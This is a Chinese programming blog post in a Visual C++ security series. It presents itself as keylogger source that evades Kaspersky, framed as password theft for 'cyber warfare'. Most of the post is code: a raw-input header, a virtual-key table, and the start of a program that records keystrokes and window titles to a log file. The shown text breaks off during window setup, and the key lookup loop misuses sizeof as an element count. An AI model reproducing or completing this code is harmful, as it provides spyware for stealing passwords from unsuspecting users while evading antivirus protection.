VisualC++信息安全编程(6)穿透卡巴斯基的键盘记录编程-网络战技术

最新推荐文章于 2017-11-15 15:22:00 发布
最新推荐文章于 2017-11-15 15:22:00 发布
阅读量635 收藏
点赞数
分类专栏: VC++ 文章标签: vc++

在国家之间的网络战争中,窃取密码是个很重要的事情。

而密码往往是键盘输入的。利用原始设备输入变化RawInput 实现键盘记录,并穿透最牛的杀毒软件卡巴斯基。

 

引用外国人的原始设备输入变化的类。请柬代码与详细注解。

 

[cpp]  view plain copy
  1. #ifndef _RAWINPUT_H  
  2. #define _RAWINPUT_H  
  3.   
  4. #include <windows.h>  
  5.   
  6. /* 
  7.  * The input is in the regular message flow, 
  8.  * the app is required to call DefWindowProc 
  9.  * so that the system can perform clean ups. 
  10.  */  
  11. #define RIM_INPUT       0  
  12.   
  13. /* 
  14.  * The input is sink only. The app is expected 
  15.  * to behave nicely. 
  16.  */  
  17. #define RIM_INPUTSINK   1  
  18.   
  19.   
  20. /* 
  21.  * Raw Input data header 
  22.  */  
  23. typedef struct tagRAWINPUTHEADER {  
  24.     DWORD dwType;  
  25.     DWORD dwSize;  
  26.     HANDLE hDevice;  
  27.     WPARAM wParam;  
  28. } RAWINPUTHEADER, *PRAWINPUTHEADER, *LPRAWINPUTHEADER;  
  29.   
  30. /* 
  31.  * Type of the raw input 
  32.  */  
  33. #define RIM_TYPEMOUSE       0  
  34. #define RIM_TYPEKEYBOARD    1  
  35. #define RIM_TYPEHID         2  
  36.   
  37. /* 
  38.  * Raw format of the mouse input 
  39.  */  
  40. typedef struct tagRAWMOUSE {  
  41.     /* 
  42.      * Indicator flags. 
  43.      */  
  44.     USHORT usFlags;  
  45.   
  46.     /* 
  47.      * The transition state of the mouse buttons. 
  48.      */  
  49.     union {  
  50.         ULONG ulButtons;  
  51.         struct  {  
  52.             USHORT  usButtonFlags;  
  53.             USHORT  usButtonData;  
  54.         };  
  55.     };  
  56.   
  57.   
  58.     /* 
  59.      * The raw state of the mouse buttons. 
  60.      */  
  61.     ULONG ulRawButtons;  
  62.   
  63.     /* 
  64.      * The signed relative or absolute motion in the X direction. 
  65.      */  
  66.     LONG lLastX;  
  67.   
  68.     /* 
  69.      * The signed relative or absolute motion in the Y direction. 
  70.      */  
  71.     LONG lLastY;  
  72.   
  73.     /* 
  74.      * Device-specific additional information for the event. 
  75.      */  
  76.     ULONG ulExtraInformation;  
  77.   
  78. } RAWMOUSE, *PRAWMOUSE, *LPRAWMOUSE;  
  79.   
  80. /* 
  81.  * Define the mouse button state indicators. 
  82.  */  
  83.   
  84. #define RI_MOUSE_LEFT_BUTTON_DOWN   0x0001  // Left Button changed to down.  
  85. #define RI_MOUSE_LEFT_BUTTON_UP     0x0002  // Left Button changed to up.  
  86. #define RI_MOUSE_RIGHT_BUTTON_DOWN  0x0004  // Right Button changed to down.  
  87. #define RI_MOUSE_RIGHT_BUTTON_UP    0x0008  // Right Button changed to up.  
  88. #define RI_MOUSE_MIDDLE_BUTTON_DOWN 0x0010  // Middle Button changed to down.  
  89. #define RI_MOUSE_MIDDLE_BUTTON_UP   0x0020  // Middle Button changed to up.  
  90.   
  91. #define RI_MOUSE_BUTTON_1_DOWN      RI_MOUSE_LEFT_BUTTON_DOWN  
  92. #define RI_MOUSE_BUTTON_1_UP        RI_MOUSE_LEFT_BUTTON_UP  
  93. #define RI_MOUSE_BUTTON_2_DOWN      RI_MOUSE_RIGHT_BUTTON_DOWN  
  94. #define RI_MOUSE_BUTTON_2_UP        RI_MOUSE_RIGHT_BUTTON_UP  
  95. #define RI_MOUSE_BUTTON_3_DOWN      RI_MOUSE_MIDDLE_BUTTON_DOWN  
  96. #define RI_MOUSE_BUTTON_3_UP        RI_MOUSE_MIDDLE_BUTTON_UP  
  97.   
  98. #define RI_MOUSE_BUTTON_4_DOWN      0x0040  
  99. #define RI_MOUSE_BUTTON_4_UP        0x0080  
  100. #define RI_MOUSE_BUTTON_5_DOWN      0x0100  
  101. #define RI_MOUSE_BUTTON_5_UP        0x0200  
  102.   
  103. /* 
  104.  * If usButtonFlags has RI_MOUSE_WHEEL, the wheel delta is stored in usButtonData. 
  105.  * Take it as a signed value. 
  106.  */  
  107. #define RI_MOUSE_WHEEL              0x0400  
  108.   
  109. /* 
  110.  * Define the mouse indicator flags. 
  111.  */  
  112. #define MOUSE_MOVE_RELATIVE         0  
  113. #define MOUSE_MOVE_ABSOLUTE         1  
  114. #define MOUSE_VIRTUAL_DESKTOP    0x02  // the coordinates are mapped to the virtual desktop  
  115. #define MOUSE_ATTRIBUTES_CHANGED 0x04  // requery for mouse attributes  
  116.   
  117.   
  118. /* 
  119.  * Raw format of the keyboard input 
  120.  */  
  121. typedef struct tagRAWKEYBOARD {  
  122.     /* 
  123.      * The "make" scan code (key depression). 
  124.      */  
  125.     USHORT MakeCode;  
  126.   
  127.     /* 
  128.      * The flags field indicates a "break" (key release) and other 
  129.      * miscellaneous scan code information defined in ntddkbd.h. 
  130.      */  
  131.     USHORT Flags;  
  132.   
  133.     USHORT Reserved;  
  134.   
  135.     /* 
  136.      * Windows message compatible information 
  137.      */  
  138.     USHORT VKey;  
  139.     UINT   Message;  
  140.   
  141.     /* 
  142.      * Device-specific additional information for the event. 
  143.      */  
  144.     ULONG ExtraInformation;  
  145.   
  146.   
  147. } RAWKEYBOARD, *PRAWKEYBOARD, *LPRAWKEYBOARD;  
  148.   
  149.   
  150. /* 
  151.  * Define the keyboard overrun MakeCode. 
  152.  */  
  153.   
  154. #define KEYBOARD_OVERRUN_MAKE_CODE    0xFF  
  155.   
  156. /* 
  157.  * Define the keyboard input data Flags. 
  158.  */  
  159. #define RI_KEY_MAKE             0  
  160. #define RI_KEY_BREAK            1  
  161. #define RI_KEY_E0               2  
  162. #define RI_KEY_E1               4  
  163. #define RI_KEY_TERMSRV_SET_LED  8  
  164. #define RI_KEY_TERMSRV_SHADOW   0x10  
  165.   
  166.   
  167. /* 
  168.  * Raw format of the input from Human Input Devices 
  169.  */  
  170. typedef struct tagRAWHID {  
  171.     DWORD dwSizeHid;    // byte size of each report  
  172.     DWORD dwCount;      // number of input packed  
  173.     BYTE bRawData[1];  
  174. } RAWHID, *PRAWHID, *LPRAWHID;  
  175.   
  176. /* 
  177.  * RAWINPUT data structure. 
  178.  */  
  179. typedef struct tagRAWINPUT {  
  180.     RAWINPUTHEADER header;  
  181.     union {  
  182.         RAWMOUSE    mouse;  
  183.         RAWKEYBOARD keyboard;  
  184.         RAWHID      hid;  
  185.     } data;  
  186. } RAWINPUT, *PRAWINPUT, *LPRAWINPUT;  
  187.   
  188. /* 
  189.  * Flags for GetRawInputData 
  190.  */  
  191.   
  192. #define RID_INPUT               0x10000003  
  193. #define RID_HEADER              0x10000005  
  194.   
  195. typedef struct HRAWINPUT__ * HRAWINPUT;  
  196.   
  197. typedef  
  198. UINT  
  199. (_stdcall * PGetRawInputData)(  
  200.     HRAWINPUT hRawInput,  
  201.     UINT uiCommand,  
  202.     LPVOID pData,  
  203.     PUINT pcbSize,  
  204.     UINT cbSizeHeader  
  205. );  
  206.   
  207. /* 
  208.  * Raw Input Device Information 
  209.  */  
  210. #define RIDI_PREPARSEDDATA      0x20000005  
  211. #define RIDI_DEVICENAME         0x20000007  // the return valus is the character length, not the byte size  
  212. #define RIDI_DEVICEINFO         0x2000000b  
  213.   
  214. typedef struct tagRID_DEVICE_INFO_MOUSE {  
  215.     DWORD dwId;  
  216.     DWORD dwNumberOfButtons;  
  217.     DWORD dwSampleRate;  
  218. } RID_DEVICE_INFO_MOUSE, *PRID_DEVICE_INFO_MOUSE;  
  219.   
  220. typedef struct tagRID_DEVICE_INFO_KEYBOARD {  
  221.     DWORD dwType;  
  222.     DWORD dwSubType;  
  223.     DWORD dwKeyboardMode;  
  224.     DWORD dwNumberOfFunctionKeys;  
  225.     DWORD dwNumberOfIndicators;  
  226.     DWORD dwNumberOfKeysTotal;  
  227. } RID_DEVICE_INFO_KEYBOARD, *PRID_DEVICE_INFO_KEYBOARD;  
  228.   
  229. typedef struct tagRID_DEVICE_INFO_HID {  
  230.     DWORD dwVendorId;  
  231.     DWORD dwProductId;  
  232.     DWORD dwVersionNumber;  
  233.   
  234.     /* 
  235.      * Top level collection UsagePage and Usage 
  236.      */  
  237.     USHORT usUsagePage;  
  238.     USHORT usUsage;  
  239. } RID_DEVICE_INFO_HID, *PRID_DEVICE_INFO_HID;  
  240.   
  241. typedef struct tagRID_DEVICE_INFO {  
  242.     DWORD cbSize;  
  243.     DWORD dwType;  
  244.     union {  
  245.         RID_DEVICE_INFO_MOUSE mouse;  
  246.         RID_DEVICE_INFO_KEYBOARD keyboard;  
  247.         RID_DEVICE_INFO_HID hid;  
  248.     };  
  249. } RID_DEVICE_INFO, *PRID_DEVICE_INFO, *LPRID_DEVICE_INFO;  
  250.   
  251. typedef  
  252. UINT  
  253. (_stdcall * PGetRawInputDeviceInfoA)(  
  254.     HANDLE hDevice,  
  255.     UINT uiCommand,  
  256.     LPVOID pData,  
  257.     PUINT pcbSize  
  258. );  
  259.   
  260. typedef  
  261. UINT  
  262. (_stdcall * PGetRawInputDeviceInfoW)(  
  263.     HANDLE hDevice,  
  264.     UINT uiCommand,  
  265.     LPVOID pData,  
  266.     PUINT pcbSize  
  267. );  
  268.   
  269.   
  270.   
  271. /* 
  272.  * Raw Input Bulk Read: GetRawInputBuffer 
  273.  */  
  274. typedef  
  275. UINT  
  276. (_stdcall * PGetRawInputBuffer)(  
  277.     PRAWINPUT pData,  
  278.     PUINT pcbSize,  
  279.     UINT cbSizeHeader  
  280. );  
  281.   
  282. /* 
  283.  * Raw Input request APIs 
  284.  */  
  285. typedef struct tagRAWINPUTDEVICE {  
  286.     USHORT usUsagePage; // Toplevel collection UsagePage  
  287.     USHORT usUsage;     // Toplevel collection Usage  
  288.     DWORD dwFlags;  
  289.     HWND hwndTarget;    // Target hwnd. NULL = follows keyboard focus  
  290. } RAWINPUTDEVICE, *PRAWINPUTDEVICE, *LPRAWINPUTDEVICE;  
  291.   
  292. typedef CONST RAWINPUTDEVICE* PCRAWINPUTDEVICE;  
  293.   
  294. #define RIDEV_REMOVE            0x00000001  
  295. #define RIDEV_EXCLUDE           0x00000010  
  296. #define RIDEV_PAGEONLY          0x00000020  
  297. #define RIDEV_NOLEGACY          0x00000030  
  298. #define RIDEV_INPUTSINK         0x00000100  
  299. #define RIDEV_CAPTUREMOUSE      0x00000200  // effective when mouse nolegacy is specified, otherwise it would be an error  
  300. #define RIDEV_NOHOTKEYS         0x00000200  // effective for keyboard.  
  301. #define RIDEV_APPKEYS           0x00000400  // effective for keyboard.  
  302. #define RIDEV_EXMODEMASK        0x000000F0  
  303.   
  304. #define RIDEV_EXMODE(mode)  ((mode) & RIDEV_EXMODEMASK)  
  305.   
  306. typedef  
  307. BOOL  
  308. (_stdcall * PRegisterRawInputDevices)(  
  309.     PCRAWINPUTDEVICE pRawInputDevices,  
  310.     UINT uiNumDevices,  
  311.     UINT cbSize  
  312. );  
  313.   
  314. typedef  
  315. UINT  
  316. (_stdcall * PGetRegisteredRawInputDevices)(  
  317.     PRAWINPUTDEVICE pRawInputDevices,  
  318.     PUINT puiNumDevices,  
  319.     UINT cbSize  
  320. );  
  321.   
  322.   
  323. typedef struct tagRAWINPUTDEVICELIST {  
  324.     HANDLE hDevice;  
  325.     DWORD dwType;  
  326. } RAWINPUTDEVICELIST, *PRAWINPUTDEVICELIST;  
  327.   
  328. typedef  
  329. UINT  
  330. (_stdcall * PGetRawInputDeviceList)(  
  331.     PRAWINPUTDEVICELIST pRawInputDeviceList,  
  332.     PUINT puiNumDevices,  
  333.     UINT cbSize);  
  334.   
  335. typedef  
  336. LRESULT  
  337. (_stdcall * PDefRawInputProc)(  
  338.     PRAWINPUT *paRawInput,  
  339.     INT nInput,  
  340.     UINT cbSizeHeader  
  341. );  
  342.   
  343. #define WM_INPUT 0x00ff  
  344.   
  345. #endif  
  346.   
  347. #ifndef _VKEY_H  
  348. #define _VKEY_H  
  349.   
  350. struct VKeyInfo{  
  351.     USHORT VKey;  
  352.     LPCSTR VKname;  
  353. };  
  354.   
  355. #define AddVKey(VK, VKName)   {(VK), (VKName)}  
  356.   
  357. static VKeyInfo vkis[] = {  
  358.         AddVKey(VK_LBUTTON, "Left mouse button"),  
  359.         AddVKey(VK_RBUTTON, "Right mouse button"),  
  360.         AddVKey(VK_CANCEL, "Control-break processing"),  
  361.         AddVKey(0x04, "[Middle mouse button (three-button mouse]"),  
  362.         AddVKey(0x05, "Windows 2000/XP: X1 mouse button"),  
  363.         AddVKey(0x06, "Windows 2000/XP: X2 mouse button"),  
  364.         AddVKey(0x07, "Undefined"),  
  365.         AddVKey(VK_BACK, "[BACKSPACE]"),  
  366.         AddVKey(VK_TAB, "[TAB]"),  
  367.         AddVKey(0x0A, "Reserved"),  
  368.         AddVKey(0x0B, "Reserved"),  
  369.         AddVKey(VK_CLEAR, "[CLEAR]"),  
  370.         AddVKey(VK_RETURN, "[ENTER]"),  
  371.         AddVKey(0x0E, "Undefined"),  
  372.         AddVKey(0x0F, "Undefined"),  
  373.         AddVKey(VK_SHIFT, "[SHIFT]"),  
  374.         AddVKey(VK_CONTROL, "[CTRL]"),  
  375.         AddVKey(VK_MENU, "[ALT]"),  
  376.         AddVKey(VK_PAUSE, "[PAUSE]"),  
  377.         AddVKey(VK_CAPITAL, "[caps lock]"),  
  378.         AddVKey(VK_KANA, "Input Method Editor (IME) Kana mode"),  
  379.         AddVKey(VK_HANGUL, "IME Hangul mode"),  
  380.         AddVKey(0x16, "Undefined"),  
  381.         AddVKey(VK_JUNJA, "IME Junja mode"),  
  382.         AddVKey(VK_FINAL, "IME final mode"),  
  383.         AddVKey(VK_HANJA, "IME Hanja mode"),  
  384.         AddVKey(VK_KANJI, "IME Kanji mode"),  
  385.         AddVKey(0x1A, "Undefined"),  
  386.         AddVKey(VK_ESCAPE, "[ESC]"),  
  387.         AddVKey(VK_CONVERT, "IME convert"),  
  388.         AddVKey(VK_NONCONVERT, "IME nonconvert"),  
  389.         AddVKey(VK_ACCEPT, "IME accept"),  
  390.         AddVKey(VK_MODECHANGE, "IME mode change request"),  
  391.         AddVKey(VK_SPACE, "[space]"),  
  392.         AddVKey(VK_PRIOR, "[PAGE UP]"),  
  393.         AddVKey(VK_NEXT, "[PAGE DOWN]"),  
  394.         AddVKey(VK_END, "[END]"),  
  395.         AddVKey(VK_HOME, "[HOME]"),  
  396.         AddVKey(VK_LEFT, "[LEFT ARROW]"),  
  397.         AddVKey(VK_UP, "[UP ARROW]"),  
  398.         AddVKey(VK_RIGHT, "[RIGHT ARROW]"),  
  399.         AddVKey(VK_DOWN, "[DOWN ARROW]"),  
  400.         AddVKey(VK_SELECT, "[SELECT]"),  
  401.         AddVKey(VK_PRINT, "[PRINT]"),  
  402.         AddVKey(VK_EXECUTE, "[EXECUTE]"),  
  403.         AddVKey(VK_SNAPSHOT, "[PRINT SCREEN]"),  
  404.         AddVKey(VK_INSERT, "[INSERT]"),  
  405.         AddVKey(VK_DELETE, "[DEL]"),  
  406.         AddVKey(VK_HELP, "[HELP]"),  
  407.         AddVKey(0x30, "0"),  
  408.         AddVKey(0x31, "1"),  
  409.         AddVKey(0x32, "2"),  
  410.         AddVKey(0x33, "3"),  
  411.         AddVKey(0x34, "4"),  
  412.         AddVKey(0x35, "5"),  
  413.         AddVKey(0x36, "6"),  
  414.         AddVKey(0x37, "7"),  
  415.         AddVKey(0x38, "8"),  
  416.         AddVKey(0x39, "9"),  
  417.         AddVKey(0x3A, "Undefined"),  
  418.         AddVKey(0x3B, "Undefined"),  
  419.         AddVKey(0x3C, "Undefined"),  
  420.         AddVKey(0x3D, "Undefined"),  
  421.         AddVKey(0x3E, "Undefined"),  
  422.         AddVKey(0x3F, "Undefined"),  
  423.         AddVKey(0x40, "Undefined"),  
  424.         AddVKey(0x41, "a"),  
  425.         AddVKey(0x42, "b"),  
  426.         AddVKey(0x43, "c"),  
  427.         AddVKey(0x44, "d"),  
  428.         AddVKey(0x45, "e"),  
  429.         AddVKey(0x46, "f"),  
  430.         AddVKey(0x47, "g"),  
  431.         AddVKey(0x48, "h"),  
  432.         AddVKey(0x49, "i"),  
  433.         AddVKey(0x4A, "j"),  
  434.         AddVKey(0x4B, "k"),  
  435.         AddVKey(0x4C, "l"),  
  436.         AddVKey(0x4D, "m"),  
  437.         AddVKey(0x4E, "n"),  
  438.         AddVKey(0x4F, "o"),  
  439.         AddVKey(0x50, "p"),  
  440.         AddVKey(0x51, "q"),  
  441.         AddVKey(0x52, "r"),  
  442.         AddVKey(0x53, "s"),  
  443.         AddVKey(0x54, "t"),  
  444.         AddVKey(0x55, "u"),  
  445.         AddVKey(0x56, "v"),  
  446.         AddVKey(0x57, "w"),  
  447.         AddVKey(0x58, "x"),  
  448.         AddVKey(0x59, "y"),  
  449.         AddVKey(0x5A, "z"),  
  450.   
  451.         AddVKey(VK_LWIN, "Left Windows key (Microsoft Natural keyboard)"),  
  452.         AddVKey(VK_RWIN, "Right Windows key (Natural keyboard)"),  
  453.         AddVKey(VK_APPS, "Applications key (Natural keyboard)"),  
  454.         AddVKey(0x5E, "Reserved"),  
  455.         AddVKey(VK_SLEEP, "Computer Sleep key"),  
  456.         AddVKey(VK_NUMPAD0, "Numeric keypad 0 key"),  
  457.         AddVKey(VK_NUMPAD1, "Numeric keypad 1 key"),  
  458.         AddVKey(VK_NUMPAD2, "Numeric keypad 2 key"),  
  459.         AddVKey(VK_NUMPAD3, "Numeric keypad 3 key"),  
  460.         AddVKey(VK_NUMPAD4, "Numeric keypad 4 key"),  
  461.         AddVKey(VK_NUMPAD5, "Numeric keypad 5 key"),  
  462.         AddVKey(VK_NUMPAD6, "Numeric keypad 6 key"),  
  463.         AddVKey(VK_NUMPAD7, "Numeric keypad 7 key"),  
  464.         AddVKey(VK_NUMPAD8, "Numeric keypad 8 key"),  
  465.         AddVKey(VK_NUMPAD9, "Numeric keypad 9 key"),  
  466.         AddVKey(VK_MULTIPLY, "Multiply key"),  
  467.         AddVKey(VK_ADD, "Add key"),  
  468.         AddVKey(VK_SEPARATOR, "Separator key"),  
  469.         AddVKey(VK_SUBTRACT, "Subtract key"),  
  470.         AddVKey(VK_DECIMAL, "Decimal key"),  
  471.         AddVKey(VK_DIVIDE, "Divide key"),  
  472.         AddVKey(VK_F1, "[F1]"),  
  473.         AddVKey(VK_F2, "[F2]"),  
  474.         AddVKey(VK_F3, "[F3]"),  
  475.         AddVKey(VK_F4, "[F4]"),  
  476.         AddVKey(VK_F5, "[F5]"),  
  477.         AddVKey(VK_F6, "[F6]"),  
  478.         AddVKey(VK_F7, "[F7]"),  
  479.         AddVKey(VK_F8, "[F8]"),  
  480.         AddVKey(VK_F9, "[F9]"),  
  481.         AddVKey(VK_F10, "[F10]"),  
  482.         AddVKey(VK_F11, "[F11]"),  
  483.         AddVKey(VK_F12, "[F12]"),  
  484.         AddVKey(VK_F13, "[F13]"),  
  485.         AddVKey(VK_F14, "[F14]"),  
  486.         AddVKey(VK_F15, "[F15]"),  
  487.         AddVKey(VK_F16, "[F16]"),  
  488.         AddVKey(VK_F17, "[F17]"),  
  489.         AddVKey(VK_F18, "[F18]"),  
  490.         AddVKey(VK_F19, "[F19]"),  
  491.         AddVKey(VK_F20, "[F20]"),  
  492.         AddVKey(VK_F21, "[F21]"),  
  493.         AddVKey(VK_F22, "[F22]"),  
  494.         AddVKey(VK_F23, "[F23]"),  
  495.         AddVKey(VK_F24, "[F24]"),  
  496.         AddVKey(0x88, "Unassigned"),  
  497.         AddVKey(0x89, "Unassigned"),  
  498.         AddVKey(0x8A, "Unassigned"),  
  499.         AddVKey(0x8B, "Unassigned"),  
  500.         AddVKey(0x8C, "Unassigned"),  
  501.         AddVKey(0x8D, "Unassigned"),  
  502.         AddVKey(0x8E, "Unassigned"),  
  503.         AddVKey(0x8F, "Unassigned"),  
  504.         AddVKey(VK_NUMLOCK, "[NUM LOCK]"),  
  505.         AddVKey(VK_SCROLL, "[SCROLL LOCK]"),  
  506.         AddVKey(0x92, "OEM specific"),  
  507.         AddVKey(0x93, "OEM specific"),  
  508.         AddVKey(0x94, "OEM specific"),  
  509.         AddVKey(0x95, "OEM specific"),  
  510.         AddVKey(0x96, "OEM specific"),  
  511.         AddVKey(0x97, "Unassigned"),  
  512.         AddVKey(0x98, "Unassigned"),  
  513.         AddVKey(0x99, "Unassigned"),  
  514.         AddVKey(0x9A, "Unassigned"),  
  515.         AddVKey(0x9B, "Unassigned"),  
  516.         AddVKey(0x9C, "Unassigned"),  
  517.         AddVKey(0x9D, "Unassigned"),  
  518.         AddVKey(0x9E, "Unassigned"),  
  519.         AddVKey(0x9F, "Unassigned"),  
  520.         AddVKey(VK_LSHIFT, "[Left SHIFT ]"),  
  521.         AddVKey(VK_RSHIFT, "[Right SHIFT]"),  
  522.         AddVKey(VK_LCONTROL, "[Left CONTROL]"),  
  523.         AddVKey(VK_RCONTROL, "[Right CONTROL]"),  
  524.         AddVKey(VK_LMENU, "Left MENU key"),  
  525.         AddVKey(VK_RMENU, "Right MENU key"),  
  526.         AddVKey(0xA6, "Windows 2000/XP: Browser Back key"),  
  527.         AddVKey(0xA7, "Windows 2000/XP: Browser Forward key"),  
  528.         AddVKey(0xA8, "Windows 2000/XP: Browser Refresh key"),  
  529.         AddVKey(0xA9, "Windows 2000/XP: Browser Stop key"),  
  530.         AddVKey(0xAA, "Windows 2000/XP: Browser Search key"),  
  531.         AddVKey(0xAB, "Windows 2000/XP: Browser Favorites key"),  
  532.         AddVKey(0xAC, "Windows 2000/XP: Browser Start and Home key"),  
  533.         AddVKey(0xAD, "Windows 2000/XP: Volume Mute key"),  
  534.         AddVKey(0xAE, "Windows 2000/XP: Volume Down key"),  
  535.         AddVKey(0xAF, "Windows 2000/XP: Volume Up key"),  
  536.         AddVKey(0xB0, "Windows 2000/XP: Next Track key"),  
  537.         AddVKey(0xB1, "Windows 2000/XP: Previous Track key"),  
  538.         AddVKey(0xB2, "Windows 2000/XP: Stop Media key"),  
  539.         AddVKey(0xB3, "Windows 2000/XP: Play/Pause Media key"),  
  540.         AddVKey(0xB4, "Windows 2000/XP: Start Mail key"),  
  541.         AddVKey(0xB5, "Windows 2000/XP: Select Media key"),  
  542.         AddVKey(0xB6, "Windows 2000/XP: Start Application 1 key"),  
  543.         AddVKey(0xB7, "Windows 2000/XP: Start Application 2 key"),  
  544.         AddVKey(0xB8, "Reserved"),  
  545.         AddVKey(0xB9, "Reserved"),  
  546.         AddVKey(VK_OEM_1, "Used for miscellaneous characters; it can vary by keyboard."  
  547.                           "Windows 2000/XP: For the US standard keyboard, the \';:\' key"),  
  548.         AddVKey(VK_OEM_PLUS, "Windows 2000/XP: For any country/region, the \'+\' key"),  
  549.         AddVKey(VK_OEM_COMMA, "Windows 2000/XP: For any country/region, the \',\' key"),  
  550.         AddVKey(VK_OEM_MINUS, "Windows 2000/XP: For any country/region, the \'-\' key"),  
  551.         AddVKey(VK_OEM_PERIOD, "Windows 2000/XP: For any country/region, the \'.\' key"),  
  552.         AddVKey(VK_OEM_2, "Used for miscellaneous characters; it can vary by keyboard."  
  553.                           "Windows 2000/XP: For the US standard keyboard, the \'/?\' key"),  
  554.         AddVKey(VK_OEM_3, "Used for miscellaneous characters; it can vary by keyboard."   
  555.                           "Windows 2000/XP: For the US standard keyboard, the \'`~\' key"),  
  556.         AddVKey(0xC1, "Reserved"),  
  557.         AddVKey(0xC2, "Reserved"),  
  558.         AddVKey(0xC3, "Reserved"),  
  559.         AddVKey(0xC4, "Reserved"),  
  560.         AddVKey(0xC5, "Reserved"),  
  561.         AddVKey(0xC6, "Reserved"),  
  562.         AddVKey(0xC7, "Reserved"),  
  563.         AddVKey(0xC8, "Reserved"),  
  564.         AddVKey(0xC9, "Reserved"),  
  565.         AddVKey(0xCA, "Reserved"),  
  566.         AddVKey(0xCB, "Reserved"),  
  567.         AddVKey(0xCC, "Reserved"),  
  568.         AddVKey(0xCD, "Reserved"),  
  569.         AddVKey(0xCE, "Reserved"),  
  570.         AddVKey(0xCF, "Reserved"),  
  571.         AddVKey(0xD0, "Reserved"),  
  572.         AddVKey(0xD1, "Reserved"),  
  573.         AddVKey(0xD2, "Reserved"),  
  574.         AddVKey(0xD3, "Reserved"),  
  575.         AddVKey(0xD4, "Reserved"),  
  576.         AddVKey(0xD5, "Reserved"),  
  577.         AddVKey(0xD6, "Reserved"),  
  578.         AddVKey(0xD7, "Reserved"),  
  579.         AddVKey(0xD8, "Unassigned"),  
  580.         AddVKey(0xD9, "Unassigned"),  
  581.         AddVKey(0xDA, "Unassigned"),  
  582.         AddVKey(VK_OEM_4, "Used for miscellaneous characters; it can vary by keyboard."   
  583.                           "Windows 2000/XP: For the US standard keyboard, the \'[{\' key"),  
  584.         AddVKey(VK_OEM_5, "Used for miscellaneous characters; it can vary by keyboard."   
  585.                           "Windows 2000/XP: For the US standard keyboard, the \'\\|\' key"),  
  586.         AddVKey(VK_OEM_6, "Used for miscellaneous characters; it can vary by keyboard."   
  587.                           "Windows 2000/XP: For the US standard keyboard, the \']}\' key"),  
  588.         AddVKey(VK_OEM_7, "Used for miscellaneous characters; it can vary by keyboard."   
  589.                           "Windows 2000/XP: For the US standard keyboard, the \'single-quote/double-quote\' key"),  
  590.   
  591.         AddVKey(VK_OEM_8, "Used for miscellaneous characters; it can vary by keyboard."),  
  592.         AddVKey(0xE0, "Reserved"),  
  593.         AddVKey(0xE1, "OEM specific"),  
  594.         AddVKey(VK_OEM_102, "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard"),  
  595.         AddVKey(0xE3, "OEM specific"),  
  596.         AddVKey(0xE4, "OEM specific"),  
  597.         AddVKey(VK_PROCESSKEY, "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key"),  
  598.         AddVKey(0xE6, "OEM specific"),  
  599.         AddVKey(0xE7, "Windows 2000/XP: Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods. For more information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP"),  
  600.         AddVKey(0xE8, "Unassigned"),  
  601.         AddVKey(0xE9, "OEM specific"),  
  602.         AddVKey(0xEA, "OEM specific"),  
  603.         AddVKey(0xEB, "OEM specific"),  
  604.         AddVKey(0xEC, "OEM specific"),  
  605.         AddVKey(0xED, "OEM specific"),  
  606.         AddVKey(0xEF, "OEM specific"),  
  607.         AddVKey(0xF0, "OEM specific"),  
  608.         AddVKey(0xF1, "OEM specific"),  
  609.         AddVKey(0xF2, "OEM specific"),  
  610.         AddVKey(0xF3, "OEM specific"),  
  611.         AddVKey(0xF4, "OEM specific"),  
  612.         AddVKey(0xF5, "OEM specific"),  
  613.         AddVKey(VK_ATTN, "Attn key"),  
  614.         AddVKey(VK_CRSEL, "CrSel key"),  
  615.         AddVKey(VK_EXSEL, "ExSel key"),  
  616.         AddVKey(VK_EREOF, "Erase EOF key"),  
  617.         AddVKey(VK_PLAY, "Play key"),  
  618.         AddVKey(VK_ZOOM, "Zoom key"),  
  619.         AddVKey(VK_NONAME, "Reserved"),  
  620.         AddVKey(VK_PA1, "PA1 key"),  
  621.         AddVKey(VK_OEM_CLEAR, "Clear key"),  
  622.         AddVKey(0xFF, "Unknown Virtual-Key Code")  
  623. };  
  624.   
  625.   
  626. LPCSTR GetKeyName(USHORT VKey)  
  627. {  
  628.     for(int i = 0; i < sizeof(vkis); i++)  
  629.     {  
  630.         if(VKey == vkis[i].VKey)  
  631.             return vkis[i].VKname;  
  632.     }  
  633.     return vkis[--i].VKname;  
  634. }  
  635.   
  636.   
  637. #endif  


 

实现过程如下,在应用程序中调用之。

 

[cpp]  view plain copy
  1. #include "rawinput.h"  
  2.   
  3. LRESULT CALLBACK WndProc(HWNDUINTWPARAMLPARAM);  
  4. HANDLE  InitLogFile(void);  
  5. bool    Intial(HINSTANCE hInstance);  
  6. BOOL    RegisitKeyBord(HWND hwnd);  
  7. PVOID   GetApiAdd(LPCSTR dllname, LPCSTR procname);  
  8.   
  9. HWND    prev = NULL;  
  10. HANDLE  hFile;  
  11. char *szInfo = "一个穿透卡巴的键盘记录(带窗口标题获取)利用原始设备输入变化RawInput 键盘记录在当前目录下的Keylog.txt中";  
  12. char *szTips = <a href="http://blog.csdn.net/yincheng01">http://blog.csdn.net/yincheng01</a>;  
  13.   
  14. int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE,PSTR,int iCmdShow)  
  15. {  
  16.     MSG  msg;  
  17.   
  18.     Intial(hInstance);  
  19.   
  20.     while(GetMessage(&msg, NULL, 0, 0))  
  21.     {  
  22.         TranslateMessage(&msg);  
  23.         DispatchMessage(&msg);  
  24.     }  
  25.   
  26.     return 0;  
  27. }  
  28.   
  29. bool Intial(HINSTANCE hInstance)  
  30. {  
  31.    HWND                hWnd;  
  32.      
  33.    WNDCLASS            wndClass;  
  34.   
  35.    wndClass.style          = CS_HREDRAW | CS_VREDRAW;  
  36.    wndClass.lpfnWndProc    = WndProc;  
  37.    wndClass.cbClsExtra     = 0;  
  38.    wndClass.cbWndExtra     = 0;  
  39.    wndClass.hInstance      = hInstance;  
  40.    wndClass.hIcon          = LoadIcon(NULL, IDI_APPLICATION);  
  41.    wndClass.hCursor        = LoadCursor(NULL, IDC_ARROW);  
  42.    wndClass.hbrBackground  = (HBRUSH)GetStockObject(WHITE_BRUSH);  
  43.    wndClass.lpszMenuName   = NULL;  
  44.    wndClass.lpszClassName  = TEXT("Twnd");  
  45.    RegisterClass(&wndClass);  
  46.      
  47.      
  48.    hWnd = CreateWindow(  
  49.       TEXT("Twnd"),   // window class name  
